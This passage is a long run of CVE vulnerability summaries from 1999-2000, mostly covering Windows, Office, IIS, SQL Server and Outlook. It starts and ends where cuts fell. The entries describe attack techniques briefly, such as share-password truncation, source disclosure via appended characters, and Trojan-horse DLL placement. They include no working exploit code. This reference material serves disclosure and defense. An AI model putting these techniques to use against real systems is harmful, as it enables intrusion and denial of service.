(VM) in Internet Explorer 4.x and 5.x allows an unsigned applet to create and use ActiveX controls, which allows a remote attacker to bypass Internet Explorer's security settings and execute arbitrary commands via a malicious web page or email, aka the "Microsoft VM ActiveX Component" vulnerability. [CVE-2000-1060] The default configuration of XFCE 3.5.1 bypasses the Xauthority access control mechanism with an "xhost + localhost" command in the xinitrc program, which allows local users to sniff X Windows traffic and gain privileges. [CVE-2000-1059] The default configuration of the Xsession file in Mandrake Linux 7.1 and 7.0 bypasses the Xauthority access control mechanism with an "xhost + localhost" command, which allows local users to sniff X Windows events and gain privileges. [CVE-2000-1034] Buffer overflow in the System Monitor ActiveX control in Windows 2000 allows remote attackers to execute arbitrary commands via a long LogFileName parameter in HTML source code, aka the "ActiveX Parameter Validation" vulnerability. [CVE-2000-1006] Microsoft Exchange Server 5.5 does not properly handle a MIME header with a blank charset specified, which allows remote attackers to cause a denial of service via a charset="" command, aka the "Malformed MIME Header" vulnerability. [CVE-2000-1003] NETBIOS client in Windows 95 and Windows 98 allows a remote attacker to cause a denial of service by changing a file sharing service to return an unknown driver type, which causes the client to crash. [CVE-2000-0991] Buffer overflow in Hilgraeve, Inc. HyperTerminal client on Windows 98, ME, and 2000 allows remote attackers to execute arbitrary commands via a long telnet URL, aka the "HyperTerminal Buffer Overflow" vulnerability. [CVE-2000-0983] Microsoft NetMeeting with Remote Desktop Sharing enabled allows remote attackers to cause a denial of service (CPU utilization) via a sequence of null bytes to the NetMeeting port, aka the "NetMeeting Desktop Sharing" vulnerability. [CVE-2000-0980] NMPI (Name Management Protocol on IPX) listener in Microsoft NWLink does not properly filter packets from a broadcast address, which allows remote attackers to cause a broadcast storm and flood the network. [CVE-2000-0979] File and Print Sharing service in Windows 95, Windows 98, and Windows Me does not properly check the password for a file share, which allows remote attackers to bypass share access controls by sending a 1-byte password that matches the first character of the real password, aka the "Share Level Password" vulnerability. [CVE-2000-0933] The Input Method Editor (IME) in the Simplified Chinese version of Windows 2000 does not disable access to privileged functionality that should normally be restricted, which allows local users to gain privileges, aka the "Simplified Chinese IME State Recognition" vulnerability. [CVE-2000-0885] Buffer overflows in Microsoft Network Monitor (Netmon) allow remote attackers to execute arbitrary commands via a long Browser Name in a CIFS Browse Frame, a long SNMP community name, or a long username or filename in an SMB session, aka the "Netmon Protocol Parsing" vulnerability. NOTE: It is highly likely that this candidate will be split into multiple candidates. [CVE-2000-0854] When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document. [CVE-2000-0851] Buffer overflow in the Still Image Service in Windows 2000 allows local users to gain additional privileges via a long WM_USER message, aka the "Still Image Service Privilege Escalation" vulnerability. [CVE-2000-0834] The Windows 2000 telnet client attempts to perform NTLM authentication by default, which allows remote attackers to capture and replay the NTLM challenge/response via a telnet:// URL that points to the malicious server, aka the "Windows 2000 Telnet Client NTLM Authentication" vulnerability. [CVE-2000-0830] annclist.exe in webTV for Windows allows remote attackers to cause a denial of service by via a large, malformed UDP packet to ports 22701 through 22705. [CVE-2000-0817] Buffer overflow in the HTTP protocol parser for Microsoft Network Monitor (Netmon) allows remote attackers to execute arbitrary commands via malformed data, aka the "Netmon Protocol Parsing" vulnerability. [CVE-2000-0788] The Mail Merge tool in Microsoft Word does not prompt the user before executing Visual Basic (VBA) scripts in an Access database, which could allow an attacker to execute arbitrary commands. [CVE-2000-0777] The password protection feature of Microsoft Money can store the password in plaintext, which allows attackers with physical access to the system to obtain the password, aka the "Money Password" vulnerability. [CVE-2000-0765] Buffer overflow in the HTML interpreter in Microsoft Office 2000 allows an attacker to execute arbitrary commands via a long embedded object tag, aka the "Microsoft Office HTML Object Tag" vulnerability. [CVE-2000-0756] Microsoft Outlook 2000 does not properly process long or malformed fields in vCard (.vcf) files, which allows attackers to cause a denial of service. [CVE-2000-0753] The Microsoft Outlook mail client identifies the physical path of the sender's machine within a winmail.dat attachment to Rich Text Format (RTF) files. [CVE-2000-0737] The Service Control Manager (SCM) in Windows 2000 creates predictable named pipes, which allows a local user with console access to gain administrator privileges, aka the "Service Control Manager Named Pipe Impersonation" vulnerability. [CVE-2000-0710] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers determine the physical path of the server components by requesting an invalid URL whose name includes a standard DOS device name. [CVE-2000-0709] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers to cause a denial of service in some components by requesting a URL whose name includes a standard DOS device name. [CVE-2000-0663] The registry entry for the Windows Shell executable (Explorer.exe) in Windows NT and Windows 2000 uses a relative path name, which allows local users to execute arbitrary commands by inserting a Trojan Horse named Explorer.exe into the %Systemdrive% directory, aka the "Relative Shell Path" vulnerability. [CVE-2000-0662] Internet Explorer 5.x and Microsoft Outlook allows remote attackers to read arbitrary files by redirecting the contents of an IFRAME using the DHTML Edit Control (DHTMLED). [CVE-2000-0654] Microsoft Enterprise Manager allows local users to obtain database passwords via the Data Transformation Service (DTS) package Registered Servers Dialog dialog, aka a variant of the "DTS Password" vulnerability. [CVE-2000-0637] Microsoft Excel 97 and 2000 allows an attacker to execute arbitrary commands by specifying a malicious .dll using the Register.ID function, aka the "Excel REGISTER.ID Function" vulnerability. [CVE-2000-0621] Microsoft Outlook 98 and 2000, and Outlook Express 4.0x and 5.0x, allow remote attackers to read files on the client's system via a malformed HTML message that stores files outside of the cache, aka the "Cache Bypass" vulnerability. [CVE-2000-0612] Windows 95 and Windows 98 do not properly process spoofed ARP packets, which allows remote attackers to overwrite static entries in the cache table. [CVE-2000-0603] Microsoft SQL Server 7.0 allows a local user to bypass permissions for stored procedures by referencing them via a temporary stored procedure, aka the "Stored Procedure Permissions" vulnerability. [CVE-2000-0597] Microsoft Office 2000 (Excel and PowerPoint) and PowerPoint 97 are marked as safe for scripting, which allows remote attackers to force Internet Explorer or some email clients to save files to arbitrary locations via the Visual Basic for Applications (VBA) SaveAs function, aka the "Office HTML Script" vulnerability. [CVE-2000-0596] Internet Explorer 5.x does not warn a user before opening a Microsoft Access database file that is referenced within ActiveX OBJECT tags in an HTML document, which could allow remote attackers to execute arbitrary commands, aka the "IE Script" vulnerability. [CVE-2000-0581] Windows 2000 Telnet Server allows remote attackers to cause a denial of service by sending a continuous stream of binary zeros, which causes the server to crash. [CVE-2000-0580] Windows 2000 Server allows remote attackers to cause a denial of service by sending a continuous stream of binary zeros to various TCP and UDP ports, which significantly increases the CPU utilization. [CVE-2000-0567] Buffer overflow in Microsoft Outlook and Outlook Express allows remote attackers to execute arbitrary commands via a long Date field in an email header, aka the "Malformed E-mail Header" vulnerability. [CVE-2000-0563] The URLConnection function in MacOS Runtime Java (MRJ) 2.1 and earlier and the Microsoft virtual machine (VM) for MacOS allows a malicious web site operator to connect to arbitrary hosts using a HTTP redirection, in violation of the Java security model. [CVE-2000-0544] Windows NT and Windows 2000 hosts allow a remote attacker to cause a denial of service via malformed DCE/RPC SMBwriteX requests that contain an invalid data length. [CVE-2000-0524] Microsoft Outlook and Outlook Express allow remote attackers to cause a denial of service by sending email messages with blank fields such as BCC, Reply-To, Return-Path, or From. [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters. [CVE-2000-0487] The Protected Store in Windows 2000 does not properly select the strongest encryption when available, which causes it to use a default of 40-bit encryption instead of 56-bit DES encryption, aka the "Protected Store Key Length" vulnerability. [CVE-2000-0485] Microsoft SQL Server allows local users to obtain database passwords via the Data Transformation Service (DTS) package Properties dialog, aka the "DTS Password" vulnerability. [CVE-2000-0475] Windows 2000 allows a local user process to access another user's desktop within the same windows station, aka the "Desktop Separation" vulnerability. [CVE-2000-0420] The default configuration of SYSKEY in Windows 2000 stores the startup key in the registry, which could allow an attacker tor ecover it and use it to decrypt Encrypted File System (EFS) data. [CVE-2000-0403] The CIFS Computer Browser service on Windows NT 4.0 allows a remote attacker to cause a denial of service by sending a large number of host announcement requests to the master browse tables, aka the "HostAnnouncement Flooding" or "HostAnnouncement Frame" vulnerability. [CVE-2000-0402] The Mixed Mode authentication capability in Microsoft SQL Server 7.0 stores the System Administrator (sa) account in plaintext in a log file which is readable by any user, aka the "SQL Server 7.0 Service Pack Password" vulnerability. [CVE-2000-0400] The Microsoft Active Movie ActiveX Control in Internet Explorer 5 does not restrict which file types can be downloaded, which allows an attacker to download any type of file to a user's system by encoding it within an email message or news post. [CVE-2000-0377] The Remote Registry server in Windows NT 4.0 allows local authenticated users to cause a denial of service via a malformed request, which causes the winlogon process to fail, aka the "Remote Registry Access Authentication" vulnerability. [CVE-2000-0347] Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name. [CVE-2000-0330] The networking software in Windows 95 and Windows 98 allows remote attackers to execute commands via a long file name string, aka the "File Access URL" vulnerability. [CVE-2000-0329] A Microsoft ActiveX control allows a remote attacker to execute a malicious cabinet file via an attachment and an embedded script in an HTML mail, aka the "Active Setup Control" vulnerability. [CVE-2000-0328] Windows NT 4.0 generates predictable random TCP initial sequence numbers (ISN), which allows remote attackers to perform spoofing and session hijacking. [CVE-2000-0327] Microsoft Virtual Machine (VM) allows remote attackers to escape the Java sandbox and execute commands via an applet containing an illegal cast operation, aka the "Virtual Machine Verifier" vulnerability. [CVE-2000-0325] The Microsoft Jet database engine allows an attacker to execute commands via a database query, aka the "VBA Shell" vulnerability. [CVE-2000-0323] The Microsoft Jet database engine allows an attacker to modify text files via a database query, aka the "Text I-ISAM" vulnerability. [CVE-2000-0311] The Windows 2000 domain controller allows a malicious user to modify Active Directory information by modifying an unprotected attribute, aka the "Mixed Object Access" vulnerability. [CVE-2000-0305] Windows 95, Windows 98, Windows 2000, Windows NT 4.0, and Terminal Server systems allow a remote attacker to cause a denial of service by sending a large number of identical fragmented IP packets, aka jolt2 or the "IP Fragment Reassembly" vulnerability. [CVE-2000-0304] Microsoft IIS 4.0 and 5.0 with the IISADMPWD virtual directory installed allows a remote attacker to cause a denial of service via a malformed request to the inetinfo.exe program, aka the "Undelimited .HTR Request" vulnerability. [CVE-2000-0302] Microsoft Index Server allows remote attackers to view the source code of ASP files by appending a %20 to the filename in the CiWebHitsFile argument to the null.htw URL. [CVE-2000-0298] The unattended installation of Windows 2000 with the OEMPreinstall option sets insecure permissions for the All Users and Default Users directories. [CVE-2000-0277] Microsoft Excel 97 and 2000 does not warn the user when executing Excel Macro Language (XLM) macros in external text files, which could allow an attacker to execute a macro virus, aka the "XLM Text Macro" vulnerability. [CVE-2000-0260] Buffer overflow in the dvwssr.dll DLL in Microsoft Visual Interdev 1.0 allows users to cause a denial of service or execute commands, aka the "Link View Server-Side Component" vulnerability. [CVE-2000-0259] The default permissions for the Cryptography\Offload registry key used by the OffloadModExpo in Windows NT 4.0 allows local users to obtain compromise the cryptographic keys of other users. [CVE-2000-0232] Microsoft TCP/IP Printing Services, aka Print Services for Unix, allows an attacker to cause a denial of service via a malformed TCP/IP print request. [CVE-2000-0222] The installation for Windows 2000 does not activate the Administrator password until the system has rebooted, which allows remote attackers to connect to the ADMIN$ share without a password until the reboot occurs. [CVE-2000-0211] The Windows Media server allows remote attackers to cause a denial of service via a series of client handshake packets that are sent in an improper sequence, aka the "Misordered Windows Media Services Handshake" vulnerability. [CVE-2000-0202] Microsoft SQL Server 7.0 and Microsoft Data Engine (MSDE) 1.0 allow remote attackers to gain privileges via a malformed Select statement in an SQL query. [CVE-2000-0201] The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. [CVE-2000-0200] Buffer overflow in Microsoft Clip Art Gallery allows remote attackers to cause a denial of service or execute commands via a malformed CIL (clip art library) file, aka the "Clip Art Buffer Overrun" vulnerability. [CVE-2000-0199] When a new SQL Server is registered in Enterprise Manager for Microsoft SQL Server 7.0 and the "Always prompt for login name and password" option is not set, then the Enterprise Manager uses weak encryption to store the login ID and password. [CVE-2000-0197] The Windows NT scheduler uses the drive mapping of the interactive user who is currently logged onto the system, which allows the local user to gain privileges by providing a Trojan horse batch file in place of the original batch file. [CVE-2000-0162] The Microsoft virtual machine (VM) in Internet Explorer 4.x and 5.x allows a remote attacker to read files via a malicious Java applet that escapes the Java sandbox, aka the "VM File Reading" vulnerability. [CVE-2000-0161] Sample web sites on Microsoft Site Server 3.0 Commerce Edition do not validate an identification number, which allows remote attackers to execute SQL commands. [CVE-2000-0160] The Microsoft Active Setup ActiveX component in Internet Explorer 4.x and 5.x allows a remote attacker to install software components without prompting the user by stating that the software's manufacturer is Microsoft. [CVE-2000-0155] Windows NT Autorun executes the autorun.inf file on non-removable media, which allows local attackers to specify an alternate program to execute when other users access a drive. [CVE-2000-0132] Microsoft Java Virtual Machine allows remote attackers to read files via the getSystemResourceAsStream function. [CVE-2000-0121] The Recycle Bin utility in Windows NT and Windows 2000 allows local users to read or modify files by creating a subdirectory with the victim's SID in the recycler directory, aka the "Recycle Bin Creation" vulnerability. [CVE-2000-0119] The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection. [CVE-2000-0098] Microsoft Index Server allows remote attackers to determine the real path for a web directory via a request to an Internet Data Query file that does not exist. [CVE-2000-0097] The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability. [CVE-2000-0073] Buffer overflow in Microsoft Rich Text Format (RTF) reader allows attackers to cause a denial of service via a malformed control word. [CVE-2000-0070] NtImpersonateClientOfPort local procedure call in Windows NT 4.0 allows local users to gain privileges, aka "Spoofed LPC Port Request." [CVE-2000-0053] Microsoft Commercial Internet System (MCIS) IMAP server allows remote attackers to cause a denial of service via a malformed IMAP request. [CVE-1999-1593] Windows Internet Naming Service (WINS) allows remote attackers to cause a denial of service (connectivity loss) or steal credentials via a 1Ch registration that causes WINS to change the domain controller to point to a malicious server. NOTE: this problem may be limited when Windows 95/98 clients are used, or if the primary domain controller becomes unavailable. [CVE-1999-1591] Microsoft Internet Information Services (IIS) server 4.0 SP4, without certain hotfixes released for SP4, does not require authentication credentials under certain conditions, which allows remote attackers to bypass authentication requirements, as demonstrated by connecting via Microsoft Visual InterDev 6.0. [CVE-1999-1584] Unknown vulnerability in (1) loadmodule, and (2) modload if modload is installed with setuid/setgid privileges, in SunOS 4.1.1 through 4.1.3c, and Open Windows 3.0, allows local users to gain root privileges via environment variables, a different vulnerability than CVE-1999-1586. [CVE-1999-1581] Memory leak in Simple Network Management Protocol (SNMP) agent (snmp.exe) for Windows NT 4.0 before Service Pack 4 allows remote attackers to cause a denial of service (memory consumption) via a large number of SNMP packets with Object Identifiers (OIDs) that cannot be decoded. [CVE-1999-1579] The Cenroll ActiveX control (xenroll.dll) for Terminal Server Editions of Windows NT 4.0 and Windows NT Server 4.0 before SP6 allows remote attackers to cause a denial of service (resource consumption) by creating a large number of arbitrary files on the target machine. [CVE-1999-1556] Microsoft SQL Server 6.5 uses weak encryption for the password for the SQLExecutiveCmdExec account and stores it in an accessible portion of the registry, which could allow local users to gain privileges by reading and decrypting the CmdExecAccount value. [CVE-1999-1544] Buffer overflow in FTP server in Microsoft IIS 3.0 and 4.0 allows local and sometimes remote attackers to cause a denial of service via a long NLST (ls) command. [CVE-1999-1531] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag. [CVE-1999-1520] A configuration problem in the Ad Server Sample directory (AdSamples) in Microsoft Site Server 3.0 allows an attacker to obtain the SITE.CSC file, which exposes sensitive SQL database information. [CVE-1999-1476] A bug in Intel Pentium processor (MMX and Overdrive) allows local users to cause a denial of service (hang) in Intel-based operating systems such as Windows NT and Windows 95, via an invalid instruction, aka the "Invalid Operand with Locked CMPXCHG8B Instruction" problem. [CVE-1999-1463] Windows NT 4.0 before SP3 allows remote attackers to bypass firewall restrictions or cause a denial of service (crash) by sending improperly fragmented IP packets without the first fragment, which the TCP/IP stack incorrectly reassembles into a valid session. [CVE-1999-1455] RSH service utility RSHSVC in Windows NT 3.5 through 4.0 does not properly restrict access as specified in the .Rhosts file when a user comes from an authorized host, which could allow unauthorized users to access the service by logging in from an authorized host. [CVE-1999-1454] Macromedia "The Matrix" screen saver on Windows 95 with the "Password protected" option enabled allows attackers with physical access to the machine to bypass the password prompt by pressing the ESC (Escape) key. [CVE-1999-1452] GINA in Windows NT 4.0 allows attackers with physical access to display a portion of the clipboard of the user who has locked the workstation by pasting (CTRL-V) the contents into the username prompt. [CVE-1999-1430] PIM software for Royal daVinci does not properly password-protext access to data stored in the .mdb (Microsoft Access) file, which allows local users to read the data without a password by directly accessing the files with a different application, such as Access. [CVE-1999-1387] Windows NT 4.0 SP2 allows remote attackers to cause a denial of service (crash), possibly via malformed inputs or packets, such as those generated by a Linux smbmount command that was compiled on the Linux 2.0.29 kernel but executed on Linux 2.0.25. [CVE-1999-1380] Symantec Norton Utilities 2.0 for Windows 95 marks the TUNEOCX.OCX ActiveX control as safe for scripting, which allows remote attackers to execute arbitrary commands via the run option through malicious web pages that are accessed by browsers such as Internet Explorer 3.0. [CVE-1999-1368] AV Option for MS Exchange Server option for InoculateIT 4.53, and possibly other versions, only scans the Inbox folder tree of a Microsoft Exchange server, which could allow viruses to escape detection if a user's rules cause the message to be moved to a different mailbox. [CVE-1999-1365] Windows NT searches a user's home directory (%systemroot% by default) before other directories to find critical programs such as NDDEAGNT.EXE, EXPLORER.EXE, USERINIT.EXE or TASKMGR.EXE, which could allow local users to bypass access restrictions or gain privileges by placing a Trojan horse program into the root directory, which is writable by default. [CVE-1999-1364] Windows NT 4.0 allows local users to cause a denial of service (crash) via an illegal kernel mode address to the functions (1) GetThreadContext or (2) SetThreadContext. [CVE-1999-1363] Windows NT 3.51 and 4.0 allow local users to cause a denial of service (crash) by running a program that creates a large number of locks on a file, which exhausts the NonPagedPool. [CVE-1999-1362] Win32k.sys in Windows NT 4.0 before SP2 allows local users to cause a denial of service (crash) by calling certain WIN32K functions with incorrect parameters. [CVE-1999-1361] Windows NT 3.51 and 4.0 running WINS (Windows Internet Name Service) allows remote attackers to cause a denial of service (resource exhaustion) via a flood of malformed packets, which causes the server to slow down and fill the event logs with error messages. [CVE-1999-1360] Windows NT 4.0 allows local users to cause a denial of service via a user mode application that closes a handle that was opened in kernel mode, which causes a crash when the kernel attempts to close the handle. [CVE-1999-1359] When the Ntconfig.pol file is used on a server whose name is longer than 13 characters, Windows NT does not properly enforce policies for global groups, which could allow users to bypass restrictions that were intended by those policies. [CVE-1999-1358] When an administrator in Windows NT or Windows 2000 changes a user policy, the policy is not properly updated if the local ntconfig.pol is not writable by the user, which could allow local users to bypass restrictions that would otherwise be enforced by the policy, possibly by changing the policy file to be read-only. [CVE-1999-1356] Compaq Integration Maintenance Utility as used in Compaq Insight Manager agent before SmartStart 4.50 modifies the legal notice caption (LegalNoticeCaption) and text (LegalNoticeText) in Windows NT, which could produce a legal notice that is in violation of the security policy. [CVE-1999-1324] VAXstations running Open VMS 5.3 through 5.5-2 with VMS DECwindows or MOTIF do not properly disable access to user accounts that exceed the break-in limit threshold for failed login attempts, which makes it easier for attackers to conduct brute force password guessing. [CVE-1999-1317] Windows NT 4.0 SP4 and earlier allows local users to gain privileges by modifying the symbolic link table in the \?? object folder using a different case letter (upper or lower) to point to a different device. [CVE-1999-1316] Passfilt.dll in Windows NT SP2 allows users to create a password that contains the user's name, which could make it easier for an attacker to guess. [CVE-1999-1297] cmdtool in OpenWindows 3.0 and XView 3.0 in SunOS 4.1.4 and earlier allows attackers with physical access to the system to display unechoed characters (such as those from password prompts) via the L2/AGAIN key. [CVE-1999-1294] Office Shortcut Bar (OSB) in Windows 3.51 enables backup and restore permissions, which are inherited by programs such as File Manager that are started from the Shortcut Bar, which could allow local users to read folders for which they do not have permission. [CVE-1999-1289] ICQ 98 beta on Windows NT leaks the internal IP address of a client in the TCP data segment of an ICQ packet instead of the public address (e.g. through NAT), which provides remote attackers with potentially sensitive information about the client or the internal network configuration. [CVE-1999-1279] An interaction between the AS/400 shared folders feature and Microsoft SNA Server 3.0 and earlier allows users to view each other's folders when the users share the same Local APPC LU. [CVE-1999-1259] Microsoft Office 98, Macintosh Edition, does not properly initialize the disk space used by Office 98 files and effectively inserts data from previously deleted files into the Office file, which could allow attackers to obtain sensitive information. [CVE-1999-1254] Windows 95, 98, and NT 4.0 allow remote attackers to cause a denial of service by spoofing ICMP redirect messages from a router, which causes Windows to change its routing tables. [CVE-1999-1246] Direct Mailer feature in Microsoft Site Server 3.0 saves user domain names and passwords in plaintext in the TMLBQueue network share, which has insecure default permissions, allowing remote attackers to read the passwords and gain privileges. [CVE-1999-1234] LSA (LSASS.EXE) in Windows NT 4.0 allows remote attackers to cause a denial of service via a NULL policy handle in a call to (1) SamrOpenDomain, (2) SamrEnumDomainUsers, and (3) SamrQueryDomainInfo. [CVE-1999-1222] Netbt.sys in Windows NT 4.0 allows remote malicious DNS servers to cause a denial of service (crash) by returning 0.0.0.0 as the IP address for a DNS host name lookup. [CVE-1999-1217] The PATH in Windows NT includes the current working directory (.), which could allow local users to gain privileges by placing Trojan horse programs with the same name as commonly used system programs into certain directories. [CVE-1999-1206] SystemSoft SystemWizard package in HP Pavilion PC with Windows 98, and possibly other platforms and operating systems, installs two ActiveX controls that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via a malicious web page that references (1) the Launch control, or (2) the RegObj control. [CVE-1999-1201] Windows 95 and Windows 98 systems, when configured with multiple TCP/IP stacks bound to the same MAC address, allow remote attackers to cause a denial of service (traffic amplification) via a certain ICMP echo (ping) packet, which causes all stacks to send a ping response, aka TCP Chorusing. [CVE-1999-1189] Buffer overflow in Netscape Navigator/Communicator 4.7 for Windows 95 and Windows 98 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long argument after the ? character in a URL that references an .asp, .cgi, .html, or .pl file. [CVE-1999-1164] Microsoft Outlook client allows remote attackers to cause a denial of service by sending multiple email messages with the same X-UIDL headers, which causes Outlook to hang. [CVE-1999-1157] Tcpip.sys in Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service via an ICMP Subnet Mask Address Request packet, when certain multiple IP addresses are bound to the same network interface. [CVE-1999-1133] HP-UX 9.x and 10.x running X windows may allow local attackers to gain privileges via (1) vuefile, (2) vuepad, (3) dtfile, or (4) dtpad, which do not authenticate users. [CVE-1999-1132] Windows NT 4.0 allows remote attackers to cause a denial of service (crash) via extra source routing data such as (1) a Routing Information Field (RIF) field with a hop count greater than 7, or (2) a list containing duplicate Token Ring IDs. [CVE-1999-1128] Internet Explorer 3.01 on Windows 95 allows remote malicious web sites to execute arbitrary commands via a .isp file, which is automatically downloaded and executed without prompting the user. [CVE-1999-1127] Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability. [CVE-1999-1110] Windows Media Player ActiveX object as used in Internet Explorer 5.0 returns a specific error code when a file does not exist, which allows remote malicious web sites to determine the existence of files on the client. [CVE-1999-1105] Windows 95, when Remote Administration and File Sharing for NetWare Networks is enabled, creates a share (C$) when an administrator logs in remotely, which allows remote attackers to read arbitrary files by mapping the network drive. [CVE-1999-1104] Windows 95 uses weak encryption for the password list (.pwl) file used when password caching is enabled, which allows local users to gain privileges by decrypting the passwords. [CVE-1999-1097] Microsoft NetMeeting 2.1 allows one client to read the contents of another client's clipboard via a CTRL-C in the chat box when the box is empty. [CVE-1999-1065] Palm Pilot HotSync Manager 3.0.4 in Windows 98 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long string to port 14238 while the manager is in network mode. [CVE-1999-1055] Microsoft Excel 97 does not warn the user before executing worksheet functions, which could allow attackers to execute arbitrary commands by using the CALL function to execute a malicious DLL, aka the Excel "CALL Vulnerability." [CVE-1999-1052] Microsoft FrontPage stores form results in a default location in /_private/form_results.txt, which is world-readable and accessible in the document root, which allows remote attackers to read possibly sensitive information submitted by other users. [CVE-1999-1043] Microsoft Exchange Server 5.5 and 5.0 does not properly handle (1) malformed NNTP data, or (2) malformed SMTP data, which allows remote attackers to cause a denial of service (application error). [CVE-1999-1033] Microsoft Outlook Express before 4.72.3612.1700 allows a malicious user to send a message that contains a .., which can inadvertently cause Outlook to re-enter POP3 command mode and cause the POP3 session to hang. [CVE-1999-1016] Microsoft HTML control as used in (1) Internet Explorer 5.0, (2) FrontPage Express, (3) Outlook Express 5, and (4) Eudora, and possibly others, allows remote malicious web site or HTML emails to cause a denial of service (100% CPU consumption) via large HTML form fields such as text inputs in a table cell. [CVE-1999-1011] The Remote Data Service (RDS) DataFactory component of Microsoft Data Access Components (MDAC) in IIS 3.x and 4.x exposes unsafe methods, which allows remote attackers to execute arbitrary commands. [CVE-1999-0999] Microsoft SQL 7.0 server allows a remote attacker to cause a denial of service via a malformed TDS packet. [CVE-1999-0995] Windows NT Local Security Authority (LSA) allows remote attackers to cause a denial of service via malformed arguments to the LsaLookupSids function which looks up the SID, aka "Malformed Security Identifier Request." [CVE-1999-0994] Windows NT with SYSKEY reuses the keystream that is used for encrypting SAM password hashes, allowing an attacker to crack passwords. [CVE-1999-0993] Modifications to ACLs (Access Control Lists) in Microsoft Exchange 5.5 do not take effect until the directory store cache is refreshed. [CVE-1999-0987] Windows NT does not properly download a system policy if the domain user logs into the domain with a space at the end of the domain name. [CVE-1999-0980] Windows NT Service Control Manager (SCM) allows remote attackers to cause a denial of service via a malformed argument in a resource enumeration request. [CVE-1999-0975] The Windows help system can allow a local user to execute commands as another user by editing a table of contents metafile with a .CNT extension and modifying the topic action to include the commands to be executed when the .hlp file is accessed. [CVE-1999-0969] The Windows NT RPC service allows remote attackers to conduct a denial of service using spoofed malformed RPC packets which generate an error message that is sent to the spoofed host, potentially setting up a loop, aka Snork. [CVE-1999-0967] Buffer overflow in the HTML library used by Internet Explorer, Outlook Express, and Windows Explorer via the res: local resource protocol. [CVE-1999-0945] Buffer overflow in Internet Mail Service (IMS) for Microsoft Exchange 5.5 and 5.0 allows remote attackers to conduct a denial of service via AUTH or AUTHINFO commands. [CVE-1999-0918] Denial of service in various Windows systems via malformed, fragmented IGMP packets. [CVE-1999-0910] Microsoft Site Server and Commercial Internet System (MCIS) do not set an expiration for a cookie, which could then be cached by a proxy and inadvertently used by a different user. [CVE-1999-0909] Multihomed Windows systems allow a remote attacker to bypass IP source routing restrictions via a malformed packet with IP options, aka the "Spoofed Route Pointer" vulnerability. [CVE-1999-0899] The Windows NT 4.0 print spooler allows a local user to execute arbitrary commands due to inappropriate permissions that allow the user to specify an alternate print provider. [CVE-1999-0898] Buffer overflows in Windows NT 4.0 print spooler allow remote attackers to gain privileges or cause a denial of service via a malformed spooler request. [CVE-1999-0886] The security descriptor for RASMAN allows users to point to an alternate location via the Windows NT Service Control Manager. [CVE-1999-0839] Windows NT Task Scheduler installed with Internet Explorer 5 allows a user to gain privileges by modifying the job after it has been scheduled. [CVE-1999-0824] A Windows NT user can use SUBST to map a drive letter to a folder, which is not unmapped after the user logs off, potentially allowing that user to modify the location of folders accessed by later users. [CVE-1999-0815] Memory leak in SNMP agent in Windows NT 4.0 before SP5 allows remote attackers to conduct a denial of service (memory exhaustion) via a large number of queries. [CVE-1999-0794] Microsoft Excel does not warn a user when a macro is present in a Symbolic Link (SYLK) format file. [CVE-1999-0766] The Microsoft Java Virtual Machine allows a malicious Java applet to execute arbitrary commands outside of the sandbox environment. [CVE-1999-0755] Windows NT RRAS and RAS clients cache a user's password even if the user has not selected the "Save password" option. [CVE-1999-0728] A Windows NT user can disable the keyboard or mouse by directly calling the IOCTLs which control them. [CVE-1999-0726] An attacker can conduct a denial of service in Windows NT by executing a program with a malformed file image header. [CVE-1999-0723] The Windows NT Client Server Runtime Subsystem (CSRSS) can be subjected to a denial of service when all worker threads are waiting for user input. [CVE-1999-0721] Denial of service in Windows NT Local Security Authority (LSA) through a malformed LSA request. [CVE-1999-0718] IBM GINA, when used for OS/2 domain authentication of Windows NT users, allows local users to gain administrator privileges by changing the GroupMapping registry key. [CVE-1999-0717] A remote attacker can disable the virus warning mechanism in Microsoft Excel 97. [CVE-1999-0716] Buffer overflow in Windows NT 4.0 help file utility via a malformed help file. [CVE-1999-0701] After an unattended installation of Windows NT 4.0, an installation file could include sensitive information such as the local Administrator password. [CVE-1999-0700] Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file. [CVE-1999-0682] Microsoft Exchange 5.5 allows a remote attacker to relay email (i.e. spam) using encapsulated SMTP addresses, even if the anti-relaying features are enabled. [CVE-1999-0680] Windows NT Terminal Server performs extra work when a client opens a new connection but before it is authenticated, allowing for a denial of service. [CVE-1999-0665] An application-critical Windows NT registry key has an inappropriate value. [CVE-1999-0664] An application-critical Windows NT registry key has inappropriate permissions. [CVE-1999-0611] A system-critical Windows NT registry key has an inappropriate value. [CVE-1999-0603] In Windows NT, an inappropriate user is a member of a group, e.g. Administrator, Backup Operators, Domain Admins, Domain Guests, Power Users, Print Operators, Replicators, System Operators, etc. [CVE-1999-0597] A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire. [CVE-1999-0596] A Windows NT log file has an inappropriate maximum size or retention period. [CVE-1999-0595] A Windows NT system does not clear the system page file during shutdown, which might allow sensitive information to be recorded. [CVE-1999-0594] A Windows NT system does not restrict access to removable media drives such as a floppy disk drive or CDROM drive. [CVE-1999-0593] The default setting for the Winlogon key entry ShutdownWithoutLogon in Windows NT allows users with physical access to shut down a Windows NT system without logging in. 